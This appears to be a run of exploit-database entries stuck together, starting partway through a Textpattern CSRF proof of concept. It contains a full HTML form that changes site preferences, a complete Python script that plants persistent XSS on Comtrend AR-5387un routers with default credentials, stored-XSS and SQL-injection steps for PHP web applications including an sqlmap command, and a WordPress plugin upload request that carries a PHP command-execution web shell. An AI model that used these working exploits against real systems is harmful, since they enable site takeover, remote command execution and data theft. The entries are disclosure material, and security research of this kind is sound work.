use_comments=1&img_dir=images&skin_dir=themes&file_base_path=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ffiles& file_max_upload_size=2000000&tempdir=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ftextpattern%2Ftmp&plugin_cache_dir=& smtp_from=&publisher_email=&override_emailcharset=0&enable_xmlrpc_server=0&default_event=article&theme_name=hive&module_pophelp=1&default_publish_status=4& title_no_widow=0&articles_use_excerpts=1&allow_form_override=1&attach_titles_to_permalinks=1&permlink_format=1&send_lastmod=1&publish_expired_articles=0&use_textile=1&enable_short_tags=1& use_plugins=1&admin_side_plugins=1&allow_page_php_scripting=1&allow_article_php_scripting=1&max_url_len=1000&syndicate_body_or_excerpt=1&rss_how_many=5&show_comment_count_in_feed=1& include_email_atom=0&use_mail_on_feeds_id=0&comments_on_default=0&comments_default_invite=Comment&comments_moderate=1&comments_disabled_after=42&comments_auto_append=0& comments_mode=0&comments_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&comments_sendmail=0&comments_are_ol=1&comment_means_site_updated=1& comments_require_name=1&comments_require_email=1&never_display_email=1&comment_nofollow=1&comments_disallow_images=0&comments_use_fat_textile=0&spam_blacklists=& custom_1_set=custom1&custom_2_set=custom2&custom_3_set=&custom_4_set=&custom_5_set=&custom_6_set=&custom_7_set=&custom_8_set=&custom_9_set=&custom_10_set=& step=prefs_save&event=prefs&_txp_token=0342db47efb6882b488f6d367067d720 ### EXPLOIT #### <html> <!-- CSRF PoC --> <body> <form action="https://localhost/textpattern/textpattern/index.php" method="POST"> <input type="hidden" name="Submit" value="Save" /> <input type="hidden" name="sitename" value="CHANGEHERE" /> <input type="hidden" name="siteurl" value="CHANGEHERE" /> <input type="hidden" name="site&#95;slogan" value="CHANGEHERE" /> <input type="hidden" name="production&#95;status" value="testing" /> <input type="hidden" name="timezone&#95;key" value="Europe&#47;Berlin" /> <input type="hidden" name="auto&#95;dst" value="0" /> <input type="hidden" name="is&#95;dst" value="0" /> <input type="hidden" name="dateformat" value="since" /> <input type="hidden" name="archive&#95;dateformat" value="&#37;b&#32;&#37;Oe&#44;&#32;&#37;I&#58;&#37;M&#32;&#37;p" /> <input type="hidden" name="permlink&#95;mode" value="section&#95;id&#95;title" /> <input type="hidden" name="doctype" value="html5" /> <input type="hidden" name="logging" value="none" /> <input type="hidden" name="expire&#95;logs&#95;after" value="7" /> <input type="hidden" name="use&#95;comments" value="1" /> <input type="hidden" name="img&#95;dir" value="images" /> <input type="hidden" name="skin&#95;dir" value="themes" /> <input type="hidden" name="file&#95;base&#95;path" value="&#47;var&#47;www&#47;vhosts&#47;&#46;demo&#46;localhost&#46;&#47;httpdocs&#47;textpattern&#47;files" /> <input type="hidden" name="file&#95;max&#95;upload&#95;size" value="2000000" /> <input type="hidden" name="tempdir" value="&#47;var&#47;www&#47;vhosts&#47;&#46;demo&#46;localhost&#46;&#47;httpdocs&#47;textpattern&#47;textpattern&#47;tmp" /> <input type="hidden" name="plugin&#95;cache&#95;dir" value="" /> <input type="hidden" name="smtp&#95;from" value="" /> <input type="hidden" name="publisher&#95;email" value="" /> <input type="hidden" name="override&#95;emailcharset" value="0" /> <input type="hidden" name="enable&#95;xmlrpc&#95;server" value="0" /> <input type="hidden" name="default&#95;event" value="article" /> <input type="hidden" name="theme&#95;name" value="hive" /> <input type="hidden" name="module&#95;pophelp" value="1" /> <input type="hidden" name="default&#95;publish&#95;status" value="4" /> <input type="hidden" name="title&#95;no&#95;widow" value="0" /> <input type="hidden" name="articles&#95;use&#95;excerpts" value="1" /> <input type="hidden" name="allow&#95;form&#95;override" value="1" /> <input type="hidden" name="attach&#95;titles&#95;to&#95;permalinks" value="1" /> <input type="hidden" name="permlink&#95;format" value="1" /> <input type="hidden" name="send&#95;lastmod" value="1" /> <input type="hidden" name="publish&#95;expired&#95;articles" value="0" /> <input type="hidden" name="use&#95;textile" value="1" /> <input type="hidden" name="enable&#95;short&#95;tags" value="1" /> <input type="hidden" name="use&#95;plugins" value="1" /> <input type="hidden" name="admin&#95;side&#95;plugins" value="1" /> <input type="hidden" name="allow&#95;page&#95;php&#95;scripting" value="1" /> <input type="hidden" name="allow&#95;article&#95;php&#95;scripting" value="1" /> <input type="hidden" name="max&#95;url&#95;len" value="1000" /> <input type="hidden" name="syndicate&#95;body&#95;or&#95;excerpt" value="1" /> <input type="hidden" name="rss&#95;how&#95;many" value="5" /> <input type="hidden" name="show&#95;comment&#95;count&#95;in&#95;feed" value="1" /> <input type="hidden" name="include&#95;email&#95;atom" value="0" /> <input type="hidden" name="use&#95;mail&#95;on&#95;feeds&#95;id" value="0" /> <input type="hidden" name="comments&#95;on&#95;default" value="0" /> <input type="hidden" name="comments&#95;default&#95;invite" value="Comment" /> <input type="hidden" name="comments&#95;moderate" value="1" /> <input type="hidden" name="comments&#95;disabled&#95;after" value="42" /> <input type="hidden" name="comments&#95;auto&#95;append" value="0" /> <input type="hidden" name="comments&#95;mode" value="0" /> <input type="hidden" name="comments&#95;dateformat" value="&#37;b&#32;&#37;Oe&#44;&#32;&#37;I&#58;&#37;M&#32;&#37;p" /> <input type="hidden" name="comments&#95;sendmail" value="0" /> <input type="hidden" name="comments&#95;are&#95;ol" value="1" /> <input type="hidden" name="comment&#95;means&#95;site&#95;updated" value="1" /> <input type="hidden" name="comments&#95;require&#95;name" value="1" /> <input type="hidden" name="comments&#95;require&#95;email" value="1" /> <input type="hidden" name="never&#95;display&#95;email" value="1" /> <input type="hidden" name="comment&#95;nofollow" value="1" /> <input type="hidden" name="comments&#95;disallow&#95;images" value="0" /> <input type="hidden" name="comments&#95;use&#95;fat&#95;textile" value="0" /> <input type="hidden" name="spam&#95;blacklists" value="" /> <input type="hidden" name="custom&#95;1&#95;set" value="custom1" /> <input type="hidden" name="custom&#95;2&#95;set" value="custom2" /> <input type="hidden" name="custom&#95;3&#95;set" value="" /> <input type="hidden" name="custom&#95;4&#95;set" value="" /> <input type="hidden" name="custom&#95;5&#95;set" value="" /> <input type="hidden" name="custom&#95;6&#95;set" value="" /> <input type="hidden" name="custom&#95;7&#95;set" value="" /> <input type="hidden" name="custom&#95;8&#95;set" value="" /> <input type="hidden" name="custom&#95;9&#95;set" value="" /> <input type="hidden" name="custom&#95;10&#95;set" value="" /> <input type="hidden" name="step" value="prefs&#95;save" /> <input type="hidden" name="event" value="prefs" /> <input type="hidden" name="&#95;txp&#95;token" value="0342db47efb6882b488f6d367067d720" /> <input type="submit" value="Do Action" /> </form> </body> </html>

#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Exploit Title: Persistent XSS on Comtrend AR-5387un router Date: 19/10/2020 Exploit Author: OscarAkaElvis Vendor Homepage: https://www.comtrend.com/ Version: Comtrend AR-5387un router Tested on: Software/Firmware version A731-410JAZ-C04_R02.A2pD035g.d23i CVE: CVE-2018-8062 Disclosure timeline: 08/03/2018: Vulnerability was discovered 10/03/2018: Reported to Mitre (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8062) 11/03/2018: Mitre answered, CVE number reserved 11/03/2018: Reported to Comtrend as part of responsible disclosure, they never answered 16/10/2020: Two years later, reported again to Comtrend and public disclosure (https://twitter.com/OscarAkaElvis/status/1317004119509471233) 18/10/2020: Exploit creation 19/10/2020: Exploit sent to exploit-db Exploitation explanation: To exploit this vulnerability, once logged into the router, a WAN service must be created Click on "Advanced Setup", "WAN Service". "Add button", "Next" Then insert the payload into the "Enter Service Description" field. This was used for the PoC <script>alert('xss');</script> Then click on "Next" four times to go on through the steps and finally click on "Apply/Save" The result of the XSS will be displayed and triggered on the WAN services page This exploit automatize the entire process bypassing CSRF protection and allowing to set a custom XSS payload Happy hacking :) OscarAkaElvis - https://twitter.com/OscarAkaElvis """ # Dependencies and libraries import requests from requests.auth import HTTPBasicAuth import re from sys import argv, exit import argparse from os import path from time import sleep class Exploit(object): # Global class vars session = requests.Session() user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36" ip = None username = None password = None payload = None default_ip = "192.168.1.1" default_username = "admin" default_password = "admin" default_payload = "<script>alert('xss');</script>" exploit_version = "1.0" current_sessionkey = None referer_sessionkey = None script_name = path.basename(argv[0]) description_text = 'CVE-2018-8062 exploit by OscarAkaElvis, Persistent XSS on Comtrend AR-5387un router' epilog_text = 'Examples:\n python3 ' + script_name + ' -i 192.168.0.150\n python3 ' + script_name + ' -u admin -p mySecureRouterP@ss\n python3 ' + script_name + ' -i 10.0.0.1 -u admin -p mySecureRouterP@ss -x \'<script>evil_js_stuff</script>\'' def start_msg(self): print("[*] Starting CVE-2018-8062 exploit...") sleep(0.5) def check_params(self, arguments): parser = argparse.ArgumentParser(description=self.description_text, formatter_class=argparse.RawDescriptionHelpFormatter, epilog=self.epilog_text) parser.add_argument('-i', '--ip', dest='ip', required=False, help="set router's ip", metavar='IP') parser.add_argument('-u', '--username', dest='username', required=False, help="set user to login on router", metavar='USERNAME') parser.add_argument('-p', '--password', dest='password', required=False, help="set password to login on router", metavar='PASSWORD') parser.add_argument('-x', '--xss-payload', dest='payload', required=False, help="set xss payload", metavar='PAYLOAD') parser.add_argument('-v', '--version', action='version', version=self.print_version(), help="show exploit's version number and exit") args = parser.parse_args(arguments) self.start_msg() print("[*] Launch the exploit using -h argument to check all the available options") print() if not args.ip: self.ip = self.default_ip print("[!] Warning, no ip set, default will be used: " + str(self.ip)) else: self.ip = args.ip if not args.username: self.username = self.default_username print("[!] Warning, no username set, default will be used: " + str(self.username)) else: self.username = args.username if not args.password: self.password = self.default_password print("[!] Warning, no password set, default will be used: " + str(self.password)) else: self.password = args.password if not args.payload: self.payload = self.default_payload print("[!] Warning, no XSS payload set, PoC default will be used: " + str(self.payload)) else: self.password = args.password def print_version(self): print() return 'v{}'.format(self.exploit_version) def check_router(self): try: print() print("[*] Trying to detect router...") headers = {"User-Agent": self.user_agent} response = self.session.get("http://" + str(self.ip) + "/", headers=headers) if re.match(r'.*WWW-Authenticate.*Broadband Router.*', str(response.headers)): print("[+] Comtrend router detected successfully") else: print() print("[-] It seems the target is not a Comtrend router") print("[*] Exiting...") exit(1) except (TimeoutError, ConnectionError, requests.exceptions.ConnectionError): print() print("[-] Can't connect to the router") print("[*] Exiting...") exit(1) def check_login(self): print() print("[*] Trying to login...") headers = {"User-Agent": self.user_agent} response = self.session.get("http://" + str(self.ip) + "/", headers=headers, auth=HTTPBasicAuth(self.username, self.password)) if response.status_code != 401: print("[+] Login successfully!") sleep(1) else: print() print("[-] Can't login into the router. Check your creds!") print("[*] Exiting...") exit(1) def get_sessionKey(self, response_text): sessionKey = re.search(r'.*sessionKey=([0-9]+).*', str(response_text)) if sessionKey is not None: sessionKey = sessionKey.group(1) else: sessionKey = re.search(r'.*sessionKey=\\\'([0-9]+).*', str(response_text), re.MULTILINE) if sessionKey is not None: sessionKey = sessionKey.group(1) return sessionKey def step1(self): print() print("[*] Performing step 1/8. Getting initial sessionKey to bypass CSRF protection...") headers = {"User-Agent": self.user_agent} response = self.session.get("http://" + str(self.ip) + "/wancfg.cmd", headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.current_sessionkey = self.get_sessionKey(response.content) print("[+] Success! Initial sessionKey: " + self.current_sessionkey) sleep(1) def step2(self): print() print("[*] Performing step 2/8...") paramsGet = {"sessionKey": self.current_sessionkey, "serviceId": "0"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wancfg.cmd"} response = self.session.get("http://" + str(self.ip) + "/wanifc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def step3(self): print() print("[*] Performing step 3/8...") paramsGet = {"sessionKey": self.current_sessionkey, "wanL2IfName": "atm0/(0_8_35)"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wanifc.cmd?serviceId=0&sessionKey=" + self.referer_sessionkey} response = self.session.get("http://" + str(self.ip) + "/wansrvc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def step4(self): print() print("[*] Performing step 4/8...") paramsGet = {"vlanMuxPr": "-1", "sessionKey": self.current_sessionkey, "vlanMuxId": "-1", "ntwkPrtcl": "0", "enVlanMux": "1", "enblEnetWan": "0", "serviceName": self.payload} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wansrvc.cmd?wanL2IfName=atm0/(0_8_35)&sessionKey=" + self.referer_sessionkey} response = self.session.get("http://" + str(self.ip) + "/pppoe.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def step5(self): print() print("[*] Performing step 5/8...") paramsGet = {"useStaticIpAddress": "0", "pppLocalIpAddress": "0.0.0.0", "sessionKey": self.current_sessionkey, "enblIgmp": "0", "enblFullcone": "0", "pppTimeOut": "0", "pppAuthErrorRetry": "0", "pppServerName": "", "enblPppDebug": "0", "pppPassword": "", "enblNat": "0", "enblOnDemand": "0", "pppUserName": "", "pppIpExtension": "0", "enblFirewall": "0", "pppAuthMethod": "0", "pppToBridge": "0"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/pppoe.cgi?enblEnetWan=0&ntwkPrtcl=0&enVlanMux=1&vlanMuxId=-1&vlanMuxPr=-1&serviceName=pppoe_0_8_35&sessionKey=" + self.referer_sessionkey} response = self.session.get("http://" + str(self.ip) + "/ifcgateway.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def step6(self): print() print("[*] Performing step 6/8...") paramsGet = {"sessionKey": self.current_sessionkey, "defaultGatewayList": "ppp0.1"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcgateway.cgi?pppUserName=&pppPassword=&enblOnDemand=0&pppTimeOut=0&useStaticIpAddress=0&pppLocalIpAddress=0.0.0.0&pppIpExtension=0&enblNat=0&enblFirewall=0&enblFullcone=0&pppAuthMethod=0&pppServerName=&pppAuthErrorRetry=0&enblPppDebug=0&pppToBridge=0&enblIgmp=0&sessionKey=" + self.referer_sessionkey} response = self.session.get("http://" + str(self.ip) + "/ifcdns.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def step7(self): print() print("[*] Performing step 7/8...") paramsGet = {"dnsRefresh": "1", "sessionKey": self.current_sessionkey, "dnsPrimary": "1.1.1.1", "dnsSecondary": "8.8.8.8"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcdns.cgi?defaultGatewayList=ppp0.1&sessionKey=" + self.referer_sessionkey} response = self.session.get("http://" + str(self.ip) + "/ntwksum2.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) self.referer_sessionkey = self.current_sessionkey self.current_sessionkey = self.get_sessionKey(response.content) sleep(1) def final_step8(self): print() print("[*] Performing final step 8/8. Deploying XSS payload...") paramsGet = {"sessionKey": self.current_sessionkey, "action": "add"} headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ntwksum2.cgi?dnsPrimary=1.1.1.1&dnsSecondary=8.8.8.8&dnsRefresh=1&sessionKey=" + self.referer_sessionkey} self.session.get("http://" + str(self.ip) + "/wancfg.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) print() print("[+] XSS payload deployed successfully") print("[+] Happy hacking :) . Author: OscarAkaElvis") @staticmethod def main(self, arguments): self.check_params(arguments) self.check_router() self.check_login() self.step1() self.step2() self.step3() self.step4() self.step5() self.step6() self.step7() self.final_step8() exit(0) if __name__ == '__main__': ImportObject = Exploit() ImportObject.main(ImportObject, argv[1:])

# Exploit Title: WP Courses < 2.0.29 - Broken Access Controls leading to Courses Content Disclosure # Exploit Author: Stefan Broeder, Marco Ortisi (redtimmysec) # Authors blog: https://www.redtimmy.com # Vendor Homepage: https://wpcoursesplugin.com/ # Version Vulnerable: < 2.0.29 # CVE: (requested but not assigned yet) WP Courses plugin < 2.0.29 does not protect the courses which could be accessed by unauthenticated users using the REST API (/wp-jon/) endpoints (for example /wp-json/wp/v2/lesson/{lesson_id}) This could result in attackers accessing paying content without authorization. Full story here: https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/

# Exploit Title: Loan Management System 1.0 - Multiple Cross Site Scripting (Stored) # Google Dork: N/A # Date: 2020/10/19 # Exploit Author: Akıner Kısa # Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system-using-php.zip # Version: 1.0 # Tested on: XAMPP # CVE : N/A Vulnerable Pages: http://localhost/loan/index.php?page=loans http://localhost/loan/index.php?page=payments http://localhost/loan/index.php?page=borrowers http://localhost/loan/index.php?page=loan_type Proof of Concept: 1 - Go to vulnerable pages and using edit button (in the right, action column). 2 - And fill the blanks with "<script>alert(1)</script>" payload.

# Title: Visitor Management System in PHP 1.0 - Authenticated SQL Injection # Exploit Author: Rahul Ramkumar # Date: 2020-09-16 # Vendor Homepage: https://projectworlds.in # Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip # Version: 1.0 # Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1 # CVE: CVE-2020-25760 # Description The file front.php does not perform input validation on the 'rid' paramter. An attacker can append SQL queries to the input to extract sensitive information from the database. Note: This exploit can work pre-authentication as well, but need to change the 302 Response to 200 using an intercept tool. It should be pretty straight forward so I have not shown how. #POC 1) Navigate to the login page Example: http://192.168.1.72/visitor_management/index.php 2) Enter 'username' and 'password' 3) On the homepage, click on any visitor name and intercept the request 4) Save the request to file. Example, visitor_management_sqli.req GET /visitor_management/front.php?rid=373568 HTTP/1.1 Host: 192.168.1.72 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://192.168.1.72/visitor_management/front.php Cookie: PHPSESSID=emvdv3k52ngs7uf0gliajb13ef Upgrade-Insecure-Requests: 1 5) Run SQLmap on the file, sqlmap -r visitor_management_sqli.req --dbms=mysql --threads=10

# Exploit Title: WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload # Date: 2020-10-20 # Exploit Author: Net-Hunter # Google Dork: N/A # Software Link: https://ms.wordpress.org/plugins/hs-brand-logo-slider/ # Vendor Homepage: https://www.heliossolutions.co/ # Tested on: Linux Apache / Wordpress 5.5.1 # Version: 2.1 .:: Description ::. An Authenticated User Can Bypass Uploader of the Plugin and Upload Arbitary File Because the extension of the Uploaded Flie is Checked on Client Side .:: Vulnerable File ::. /wp-admin/admin.php?page=hs-brand-logo-slider.php .:: Vulnerable Code ::. Content-Disposition: form-data; name="logoupload"; filename="a.php" Content-Type: image/jpeg <?php echo system($_GET['cmd']); ?> .:: Proof Of Concept (Poc) ::. Step 1 - Log in to your account , Select hs-brand-logo-slider from the menu Upload Step 2 - Stop the upload request with burp suite Step 3 - Rename the file, for example a.jpg to a.php Step 4 - Your shell has been uploaded, showing the file path in the table .:: Sample Request::. POST /wp-admin/admin.php?page=hs-brand-logo-slider.php HTTP/1.1 Host: 172.16.1.17:81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://172.16.1.17:81/wp-admin/admin.php?page=hs-brand-logo-slider.php Content-Type: multipart/form-data; boundary=---------------------------407602771734524910834293111227 Content-Length: 81765 Origin: http://172.16.1.17:81 Connection: close Cookie: wordpress_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C15d778148be9d49e48b6275e009642192e10b1d8a9e5e44a191141084f2618b6; wp-settings-time-2=1592045029; wp-settings-2=libraryContent%3Dbrowse%26editor%3Dtinymce; wp_learn_press_session_558570ec66c8a5729fc0bd982edbc38a=9c5476d130f39254b97895578a6cf9e2%7C%7C1603353694%7C%7Cd6957c27eda7a311e486866587a08500; wordpress_test_cookie=WP+Cookie+check; wordpress_lp_guest=fad4f6783283c86762dc8944423947d0; wordpress_logged_in_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C80d7786798b351d10cbdfe07ba50c31d2400ccbfb173d4b90255cab42791ccd7; wp-settings-time-1=1603180907 Upgrade-Insecure-Requests: 1 -----------------------------407602771734524910834293111227 Content-Disposition: form-data; name="brandname" aaa -----------------------------407602771734524910834293111227 Content-Disposition: form-data; name="logoupload"; filename="eftekharr.php" Content-Type: image/jpeg <?php echo system($_GET['cmd']); ?> -----------------------------407602771734524910834293111227 Content-Disposition: form-data; name="logourl" http://aa.com -----------------------------407602771734524910834293111227 Content-Disposition: form-data; name="sortorder" 1 -----------------------------407602771734524910834293111227 Content-Disposition: form-data; name="submit_data" Submit -----------------------------407602771734524910834293111227--